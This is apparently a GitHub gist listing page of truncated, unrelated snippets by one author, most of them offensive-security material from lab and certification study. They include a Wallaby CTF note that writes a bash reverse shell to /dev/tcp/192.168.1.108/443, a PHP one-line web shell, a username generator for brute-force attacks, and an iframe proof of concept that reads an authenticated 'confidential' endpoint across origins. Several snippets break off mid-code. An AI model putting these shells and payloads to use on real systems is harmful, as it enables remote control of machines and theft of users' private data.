@avicoder
avicoder / Wallaby-CTF.md
Created January 7, 2017 13:04
Workaround

I faced an issue while executing any command using the .run command, as it doesn't support white spaces and raises an exception (for example, ls index.html).

I figured it out by creating a .sh file with a limited-privilege session (www-data) in the /html directory.

echo "#! /bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh

Now in hexchat execute:

<?php
system($_GET['cmd']);
?>
#!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
avicoder / gist:61df8adeac2becdf2b53179521d250e4
Created March 27, 2017 07:43
Compile python source code on mac - Commands
curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz
tar xzvf Python-2.7.11.tgz
cd Python-2.7.11
./configure --prefix=/usr/local --enable-shared
make
make install
avicoder / namemash.py
Created August 7, 2017 05:28 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "usage: %s names.txt" % (sys.argv[0])
        sys.exit(0)
    for line in open(sys.argv[1]):
        name = ''.join([c for c in line if c == " " or c.isalpha()])

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

avicoder / .pystartup
Created September 20, 2017 06:08 — forked from matterche/.pystartup
Enable Python REPL command history and tab completion
# Store this file in ~/.pystartup,
# set "export PYTHONSTARTUP=/home/user/.pystartup"
#
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the
# full path to your home directory.
import atexit
import os
import readline
import rlcompleter
avicoder / Attacks.md
Last active December 10, 2017 13:34
Get an Idea about Each one
  • Arbitrary file access
  • Binary planting
  • Blind SQL Injection
  • Blind XPath Injection
  • Brute force attack
  • Buffer overflow attack
  • Cache Poisoning
  • Cash Overflow
  • Clickjacking
  • Command injection attacks

Keybase proof

I hereby claim:

  • I am avicoder on github.
  • I am avicoder (https://keybase.io/avicoder) on keybase.
  • I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo

To claim this, I am signing this object:

<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
if (xhr.readyState === xhr.DONE) {
console.log(xhr.response);
}